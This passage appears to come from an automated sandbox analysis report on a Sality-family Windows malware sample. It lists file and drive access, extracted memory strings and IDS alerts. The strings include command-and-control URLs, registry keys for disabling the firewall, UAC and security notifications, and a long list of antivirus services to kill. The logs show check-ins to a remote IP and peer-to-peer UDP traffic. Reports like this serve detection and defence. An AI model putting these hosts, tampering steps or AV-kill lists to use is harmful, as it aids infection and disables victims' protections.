        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile opened: t:Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile opened: s:Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile opened: r:Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile opened: q:Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile opened: p:Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile opened: o:Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile opened: n:Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile opened: m:Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile opened: l:Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile opened: k:Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile opened: j:Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile opened: i:Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile opened: h:Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile opened: g:Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile opened: f:Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile opened: e:Jump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeFile opened: c:Jump to behavior
        Source: RHxJqGoGFB.exeBinary or memory string: [AutoRun]
        Source: RHxJqGoGFB.exeBinary or memory string: autorun.inf
        Source: RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: [AutoRun]
        Source: RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: autorun.inf
        Source: RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: _kkiuynbvnbrev406C:\hh8geqpHJTkdns6MCIDRV_VERMozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)MPRNtQuerySystemInformationSoftware\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache GlobalUserOfflineSoftware\Microsoft\Windows\CurrentVersion\Internet SettingsSoftware\Microsoft\Windows\CurrentVersionhttp://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers\KeServiceDescriptorTable_os%d%dhttp://kukutrustnet777888.info/DisableTaskMgrSoftware\Microsoft\Windows\CurrentVersion\policies\systemEnableLUASoftware\Microsoft\Windows\ShellNoRoam\MUICachemonga_bongapurity_control_7728SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile%s:*:Enabled:ipsecSYSTEM\CurrentControlSet\Services\SharedAccessStart\AuthorizedApplications\ListSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AdvancedHidden[AutoRun]
        Source: RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: shell\explore\Commandshell\Autoplay\commandDisableRegistryToolsDAEMON.Simple Poly Engine v1.1a(c) Sector\SvcSOFTWARE\Microsoft\Security CenterAntiVirusOverrideAntiVirusDisableNotifyFirewallDisableNotifyFirewallOverrideUpdatesDisableNotifyUacDisableNotifyAntiSpywareOverrideSYSTEMkukutrusted!.CreateMutexAKERNEL32TEXTUPXCODEGdiPlus.dllDEVICEMB.loghttp://\Runhttpipfltdrv.syswww.microsoft.com?%x=%d&%x=%dSYSTEM.INIUSER32.DLL.%c%s\\.\amsint32.EXE.SCRSfcIsFileProtectedsfcdrw.VDB.AVCNTDLL.DLLrnd=autorun.infEnableFirewallDoNotAllowExceptionsDisableNotificationsWNetEnumResourceAWNetOpenEnumAWNetCloseEnumADVAPI32.DLLCreateServiceAOpenSCManagerAOpenServiceACloseServiceHandleDeleteServiceControlService__hStartServiceANOTICE__drIPFILTERDRIVERChangeServiceConfigAwin%s.exe%s.exeWININET.DLLInternetOpenAInternetReadFileInternetOpenUrlAInternetCloseHandleAVPAgnitum Client Security ServiceALGAmon monitoraswUpdSvaswMon2aswRdraswSPaswTdiaswFsBlkacssrvAV Engineavast! iAVS4 Control Serviceavast! Antivirusavast! Mail Scanneravast! Web Scanneravast! Asynchronous Virus Monitoravast! Self ProtectionAVG E-mail ScannerAvira AntiVir Premium GuardAvira AntiVir Premium WebGuardAvira AntiVir Premium MailGuardBGLiveSvcBlackICECAISafeccEvtMgrccProxyccSetMgrCOMODO Firewall Pro Sandbox DrivercmdGuardcmdAgentEset ServiceEset HTTP ServerEset Personal FirewallF-Prot Antivirus Update MonitorfsbwsysFSDFWDF-Secure Gatekeeper Handler StarterFSMAGoogle Online ServicesInoRPCInoRTInoTaskISSVCKPF4KLIFLavasoftFirewallLIVESRVMcAfeeFrameworkMcShieldMcTaskManagerMpsSvcnavapsvcNOD32krnNPFMntorNSCServiceOutpost Firewall main moduleOutpostFirewallPAVFIRESPAVFNSVRPavProtPavPrSrvPAVSRVPcCtlComPersonalFirewalPREVSRVProtoPort Firewall servicePSIMSVCRapAppSharedAccessSmcServiceSNDSrvcSPBBCSvcSpIDer FS Monitor for Windows NTSpIDer Guard File System MonitorSPIDERNTSymantec Core LCSymantec Password ValidationSymantec AntiVirus Definition WatcherSavRoamSymantec AntiVirusTmntsrvTmPfwUmxAgentUmxCfgUmxLUUmxPolvsmonVSSERVWebrootDesktopFirewallDataServiceWebrootFirewallwscsvcXCOMMSystem\CurrentControlSet\Control\SafeBoot%d%d.tmpSOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList%s\%s%s\Software\Microsoft\Windows\CurrentVersion\Ext\StatsSoftware\Microsoft\Windows\CurrentVersion\Ext\StatsSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper ObjectsKERNEL32.DLLbootshellSYSTEM.INIExplorer.exeAVPM.A2GUARDA2CMD.A2SERVICE.A2FREEAVASTADVCHK.AGB.AKRNL.AHPROCMONSERVER.AIRDEFENSEALERTSVCAVIRAAMON.TROJAN.AVZ.ANTIVIRAPVXDWIN.ARMOR2NET.ASHAVAST.ASHDISP.ASHENHCD.ASHMAISV.ASHPOPWZ.ASHSERV.ASHSIMPL.ASHSKPCK.ASHWEBSV.ASWUPDSV.ASWSCANAVCIMAN.AVCONSOL.AVENGINE.AVESVC.AVEVAL.AVEVL32.AVGAMAVGCC.AVGCHSVX.AVGCSRVX.AVGNSX.AVGCC32.AVGCTRL.AVGEMC.AVGFWSRV.AVGNT.AVCENTERAVGNTMGRAVGSERV.AVGTRAY.AVGUARD.AVGUPSVC.AVGWDSVC.AVINITNT.AVKSERV.AVKSERVICE.AVKWCTL.AVP.AVP32.AVPCC.AVASTAVSERVER.AVSCHED32.AVSYNMGR.AVWUPD32.AVWUPSRV.AVXMONITORAVXQUAR.BDSWITCH.BLACKD.BLACKICE.CAFIX.BITDEFENDERCCEVTMGR.CFP.CFPCONFIG.CCSETMGR.CFIAUDIT.CLAMTRA
        Source: RHxJqGoGFB.exe, 00000000.00000002.4304663842.00000000045FC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: [autorun]
        Source: RHxJqGoGFB.exe, 00000000.00000002.4304663842.00000000045FC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: N[autorun]
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_008FA2F5 Sleep,GetTempPathA,lstrlen,lstrcat,lstrlen,lstrcpy,lstrcat,FindFirstFileA,FindNextFileA,lstrcat,lstrlen,lstrlen,lstrcmpiA,lstrcmpiA,Sleep,FindClose,Sleep,RtlExitUserThread,0_2_008FA2F5
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00901060 Sleep,lstrcat,lstrcat,FindFirstFileA,FindNextFileA,Sleep,lstrlen,lstrcat,lstrlen,lstrlen,lstrcmpiA,lstrcmpiA,lstrcpy,lstrcat,DeleteFileA,lstrcpy,lstrlen,lstrcmpiA,FindClose,Sleep,0_2_00901060
        Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCacheJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49749 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49742 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49737 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49748 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49735 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49786 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49745 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49746 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49752 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49747 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49797 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49819 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49732 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49774 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49846 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49750 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49868 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49891 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49880 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49808 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49914 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49857 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49902 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49759 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49951 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49834 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49984 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49925 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50045 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50054 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49940 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50047 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50043 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50053 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50052 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49973 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49962 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50042 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50050 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50046 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49995 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50049 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50019 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50051 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50044 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50006 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50032 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50048 -> 46.105.103.219:80
        Source: unknownNetwork traffic detected: IP country count 27
        Source: global trafficUDP traffic: 192.168.2.4:53231 -> 94.76.206.19:1473
        Source: global trafficUDP traffic: 192.168.2.4:53232 -> 89.122.185.62:7046
        Source: global trafficUDP traffic: 192.168.2.4:53233 -> 188.241.130.50:5164
        Source: global trafficUDP traffic: 192.168.2.4:53234 -> 186.211.10.235:7620
        Source: global trafficUDP traffic: 192.168.2.4:53235 -> 179.184.169.171:7368
        Source: global trafficUDP traffic: 192.168.2.4:53236 -> 84.108.73.183:4138
        Source: global trafficUDP traffic: 192.168.2.4:53237 -> 188.240.66.34:5812
        Source: global trafficUDP traffic: 192.168.2.4:49293 -> 190.73.34.36:4980
        Source: global trafficUDP traffic: 192.168.2.4:57323 -> 93.114.144.199:4310
        Source: global trafficUDP traffic: 192.168.2.4:57324 -> 122.168.100.182:6900
        Source: global trafficUDP traffic: 192.168.2.4:57874 -> 98.126.7.202:4700
        Source: global trafficUDP traffic: 192.168.2.4:57875 -> 202.56.221.5:4800
        Source: global trafficUDP traffic: 192.168.2.4:57876 -> 188.241.239.210:7451
        Source: global trafficUDP traffic: 192.168.2.4:57877 -> 187.6.136.20:6870
        Source: global trafficUDP traffic: 192.168.2.4:52164 -> 113.161.12.199:7866
        Source: global trafficUDP traffic: 192.168.2.4:52165 -> 203.146.109.163:5060
        Source: global trafficUDP traffic: 192.168.2.4:61244 -> 92.87.229.20:5350
        Source: global trafficUDP traffic: 192.168.2.4:61245 -> 59.161.19.29:7036
        Source: global trafficUDP traffic: 192.168.2.4:61246 -> 190.207.236.217:4717
        Source: global trafficUDP traffic: 192.168.2.4:61247 -> 188.214.36.212:6511
        Source: global trafficUDP traffic: 192.168.2.4:61248 -> 180.151.8.178:5140
        Source: global trafficUDP traffic: 192.168.2.4:49190 -> 177.11.161.29:8542
        Source: global trafficUDP traffic: 192.168.2.4:49191 -> 202.43.114.170:6822
        Source: global trafficUDP traffic: 192.168.2.4:49192 -> 191.37.199.39:7866
        Source: global trafficUDP traffic: 192.168.2.4:59644 -> 181.44.61.173:6787
        Source: global trafficUDP traffic: 192.168.2.4:59645 -> 118.102.149.168:6856
        Source: global trafficUDP traffic: 192.168.2.4:59646 -> 86.100.45.216:4664
        Source: global trafficUDP traffic: 192.168.2.4:55661 -> 39.1.15.172:5616
        Source: global trafficUDP traffic: 192.168.2.4:55662 -> 220.130.154.247:8030
        Source: global trafficUDP traffic: 192.168.2.4:55663 -> 113.11.62.14:6910
        Source: global trafficUDP traffic: 192.168.2.4:55664 -> 203.147.91.179:6373
        Source: global trafficUDP traffic: 192.168.2.4:55665 -> 115.78.135.71:6912
        Source: global trafficUDP traffic: 192.168.2.4:63268 -> 31.211.133.88:4664
        Source: global trafficUDP traffic: 192.168.2.4:63269 -> 89.37.188.218:7456
        Source: global trafficUDP traffic: 192.168.2.4:63270 -> 41.38.34.12:6142
        Source: global trafficUDP traffic: 192.168.2.4:63017 -> 177.22.43.78:7933
        Source: global trafficUDP traffic: 192.168.2.4:63018 -> 86.106.240.47:5372
        Source: global trafficUDP traffic: 192.168.2.4:63019 -> 150.165.220.74:6172
        Source: global trafficUDP traffic: 192.168.2.4:63020 -> 86.104.74.51:6364
        Source: global trafficUDP traffic: 192.168.2.4:63021 -> 27.106.75.127:6286
        Source: global trafficUDP traffic: 192.168.2.4:56864 -> 118.69.54.5:6235
        Source: global trafficUDP traffic: 192.168.2.4:56865 -> 190.206.225.183:9674
        Source: global trafficUDP traffic: 192.168.2.4:55477 -> 90.179.53.86:9675
        Source: global trafficUDP traffic: 192.168.2.4:55478 -> 113.162.238.152:7700
        Source: global trafficUDP traffic: 192.168.2.4:55479 -> 79.126.164.67:7143
        Source: global trafficUDP traffic: 192.168.2.4:55480 -> 202.134.163.88:4343
        Source: global trafficUDP traffic: 192.168.2.4:55481 -> 27.48.201.2:5812
        Source: global trafficUDP traffic: 192.168.2.4:55482 -> 187.40.170.3:6621
        Source: global trafficUDP traffic: 192.168.2.4:57575 -> 202.40.190.14:4993
        Source: global trafficUDP traffic: 192.168.2.4:57576 -> 191.43.4.101:7940
        Source: global trafficUDP traffic: 192.168.2.4:57577 -> 5.204.242.202:6976
        Source: global trafficUDP traffic: 192.168.2.4:52244 -> 41.77.183.102:5415
        Source: global trafficUDP traffic: 192.168.2.4:52245 -> 175.102.10.34:5777
        Source: global trafficUDP traffic: 192.168.2.4:52246 -> 123.27.55.144:6130
        Source: global trafficUDP traffic: 192.168.2.4:52247 -> 94.156.127.59:7948
        Source: global trafficUDP traffic: 192.168.2.4:52248 -> 200.205.47.222:5078
        Source: global trafficUDP traffic: 192.168.2.4:53804 -> 114.41.80.242:5092
        Source: global trafficUDP traffic: 192.168.2.4:53805 -> 92.87.163.40:6755
        Source: global trafficUDP traffic: 192.168.2.4:53806 -> 189.45.44.210:6018
        Source: global trafficUDP traffic: 192.168.2.4:50247 -> 23.92.221.54:5188
        Source: global trafficUDP traffic: 192.168.2.4:50248 -> 59.93.199.71:6755
        Source: global trafficUDP traffic: 192.168.2.4:50249 -> 119.189.3.27:5335
        Source: global trafficUDP traffic: 192.168.2.4:50250 -> 122.168.100.184:7119
        Source: global trafficUDP traffic: 192.168.2.4:50251 -> 180.218.251.35:5415
        Source: global trafficUDP traffic: 192.168.2.4:51946 -> 115.254.32.245:4980
        Source: global trafficUDP traffic: 192.168.2.4:51947 -> 37.142.67.58:6373
        Source: global trafficUDP traffic: 192.168.2.4:51948 -> 113.161.196.135:4879
        Source: global trafficUDP traffic: 192.168.2.4:59344 -> 123.30.169.88:6500
        Source: global trafficUDP traffic: 192.168.2.4:59345 -> 61.135.18.66:5890
        Source: global trafficUDP traffic: 192.168.2.4:59346 -> 190.37.87.100:7411
        Source: global trafficUDP traffic: 192.168.2.4:59347 -> 123.27.31.5:7119
        Source: global trafficUDP traffic: 192.168.2.4:59348 -> 190.204.201.41:6195
        Source: global trafficUDP traffic: 192.168.2.4:49690 -> 183.83.206.61:7119
        Source: global trafficUDP traffic: 192.168.2.4:49691 -> 41.186.11.53:4245
        Source: global trafficUDP traffic: 192.168.2.4:49332 -> 189.13.99.195:8180
        Source: global trafficUDP traffic: 192.168.2.4:49333 -> 122.100.99.156:5415
        Source: global trafficUDP traffic: 192.168.2.4:49334 -> 117.196.243.174:4756
        Source: global trafficUDP traffic: 192.168.2.4:49335 -> 118.69.52.216:8198
        Source: global trafficUDP traffic: 192.168.2.4:49336 -> 59.9.134.51:6989
        Source: global trafficUDP traffic: 192.168.2.4:49337 -> 200.8.30.163:6511
        Source: global trafficUDP traffic: 192.168.2.4:52919 -> 178.211.97.155:6910
        Source: global trafficUDP traffic: 192.168.2.4:52920 -> 189.13.136.81:7620
        Source: global trafficUDP traffic: 192.168.2.4:55662 -> 210.66.249.227:6755
        Source: global trafficUDP traffic: 192.168.2.4:55663 -> 86.106.240.116:6142
        Source: global trafficUDP traffic: 192.168.2.4:55664 -> 189.25.10.24:7990
        Source: global trafficUDP traffic: 192.168.2.4:55665 -> 78.187.175.231:7866
        Source: global trafficUDP traffic: 192.168.2.4:55666 -> 110.78.163.76:6822
        Source: global trafficUDP traffic: 192.168.2.4:55667 -> 190.36.155.238:5380
        Source: global trafficUDP traffic: 192.168.2.4:65235 -> 190.147.184.75:6455
        Source: global trafficUDP traffic: 192.168.2.4:55503 -> 118.69.244.25:8455
        Source: global trafficUDP traffic: 192.168.2.4:55504 -> 59.127.110.115:44848
        Source: global trafficUDP traffic: 192.168.2.4:55505 -> 179.212.232.131:4588
        Source: global trafficUDP traffic: 192.168.2.4:55506 -> 112.78.3.138:8281
        Source: global trafficUDP traffic: 192.168.2.4:55507 -> 130.204.120.42:5549
        Source: global trafficUDP traffic: 192.168.2.4:55508 -> 113.160.133.171:7768
        Source: global trafficUDP traffic: 192.168.2.4:55509 -> 202.59.129.35:4245
        Source: global trafficUDP traffic: 192.168.2.4:51019 -> 203.177.71.171:5584
        Source: global trafficUDP traffic: 192.168.2.4:57864 -> 93.157.193.78:4440
        Source: global trafficUDP traffic: 192.168.2.4:57865 -> 92.87.229.53:6130
        Source: global trafficUDP traffic: 192.168.2.4:57866 -> 177.70.129.10:6636
        Source: global trafficUDP traffic: 192.168.2.4:57867 -> 190.206.122.109:5480
        Source: global trafficUDP traffic: 192.168.2.4:57868 -> 186.94.161.129:5415
        Source: global trafficUDP traffic: 192.168.2.4:57869 -> 41.103.106.172:6373
        Source: global trafficUDP traffic: 192.168.2.4:57870 -> 190.147.4.186:4717
        Source: global trafficUDP traffic: 192.168.2.4:59466 -> 113.171.248.2:6538
        Source: global trafficUDP traffic: 192.168.2.4:59467 -> 91.244.214.41:5540
        Source: global trafficUDP traffic: 192.168.2.4:56604 -> 201.211.227.242:5380
        Source: global trafficUDP traffic: 192.168.2.4:56605 -> 177.9.220.111:6554
        Source: global trafficUDP traffic: 192.168.2.4:56606 -> 186.89.27.138:7150
        Source: global trafficUDP traffic: 192.168.2.4:56607 -> 177.125.164.144:8032
        Source: global trafficUDP traffic: 192.168.2.4:56608 -> 109.160.120.6:4588
        Source: global trafficUDP traffic: 192.168.2.4:56609 -> 186.233.253.245:6304
        Source: global trafficUDP traffic: 192.168.2.4:49333 -> 178.54.140.104:4324
        Source: global trafficUDP traffic: 192.168.2.4:49334 -> 202.164.40.66:7866
        Source: global trafficUDP traffic: 192.168.2.4:64646 -> 201.81.99.192:5415
        Source: global trafficUDP traffic: 192.168.2.4:64647 -> 27.251.25.201:5089
        Source: global trafficUDP traffic: 192.168.2.4:64648 -> 190.37.212.191:5415
        Source: global trafficUDP traffic: 192.168.2.4:64649 -> 86.124.69.204:6953
        Source: global trafficUDP traffic: 192.168.2.4:64650 -> 92.255.170.197:49928
        Source: global trafficUDP traffic: 192.168.2.4:64651 -> 203.98.101.59:5460
        Source: global trafficUDP traffic: 192.168.2.4:65023 -> 121.42.25.3:10510
        Source: global trafficUDP traffic: 192.168.2.4:65024 -> 182.73.61.11:5350
        Source: global trafficUDP traffic: 192.168.2.4:62741 -> 190.204.170.165:6219
        Source: global trafficUDP traffic: 192.168.2.4:62742 -> 69.195.140.124:9675
        Source: global trafficUDP traffic: 192.168.2.4:62743 -> 85.65.46.116:5225
        Source: global trafficUDP traffic: 192.168.2.4:62744 -> 184.44.28.10:4392
        Source: global trafficUDP traffic: 192.168.2.4:62745 -> 110.164.71.147:4539
        Source: global trafficUDP traffic: 192.168.2.4:62746 -> 211.22.167.175:5820
        Source: global trafficUDP traffic: 192.168.2.4:63571 -> 218.208.102.21:6228
        Source: global trafficUDP traffic: 192.168.2.4:55286 -> 36.224.135.49:5380
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49749 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49742 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49735 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49748 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49786 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49745 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49746 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49752 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49819 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49747 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49797 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49732 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49774 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49846 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49750 -> 46.105.103.219:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49868 -> 46.105.103.219:80
